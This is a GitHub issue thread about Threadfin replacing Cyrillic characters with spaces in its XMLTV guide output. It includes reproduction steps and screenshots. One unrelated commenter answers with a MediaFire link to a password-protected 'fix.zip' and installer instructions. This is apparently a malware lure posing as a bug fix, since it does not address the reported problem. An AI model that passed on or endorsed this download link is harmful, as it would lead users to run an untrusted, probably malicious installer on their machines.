### ISSUE TITLE
Ciryllic chars are replaced in resulting XMLTV file

### ISSUE THREAD

**Issue by ArtVorushenko** [Threadfin/Threadfin#343]
#### Please first read the [documentation](https://github.com/Threadfin/Threadfin/blob/main/en/configuration.md). Problems affecting the client, e.g. Plex or Emby should be reported there in the forum.

**Describe the bug**
XMLTV guide contains broken programmes titles if they contain ciryllic symbols.

**Server**
 - OS: Docker compose on linux (https://hub.docker.com/r/fyb3roptik/threadfin)
 - Version 1.2 (2)

**To Reproduce**
1. EPG Source must be set to XEPG
2. Import m3u playlist in corresponding menu (in my case it is a link to my iptv provider)
3. Import XMLTV playlist in corresponding menu (for my case this is http://epg.g-cdn.app/xmltv.xml.gz) 
3. Download XMLTV file provided by Threadfin from source threadfin_host:threadfin_port/xmltv/threadfin.xml

**Expected behavior**
TV guide contains texts in ciryllic.

**Actual behavior**
Cyrillic symbols are replaced by space char.

**Screenshots**
This is how it looks from Plex perspective:
![image](https://github.com/user-attachments/assets/90c0e5b5-6f77-4861-85d9-7f17a46b8eb2)
This is how it looks in xml file
![image](https://github.com/user-attachments/assets/284828b5-db4e-490b-8227-626a22d34fab)
:

**Additional context**
I tried to reproduce this bug with Xteve, but Xteve managed to handle ciryllic symbols in xmltv guide without any problems. Looks like something is wrong with encoding during guide preparation. Threadfin log does not show any problems at all - everything is fine. Toggle "allow non-ascii" does not take an affect too.

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Fyb3roptik** [comment]
Glad you got it working!
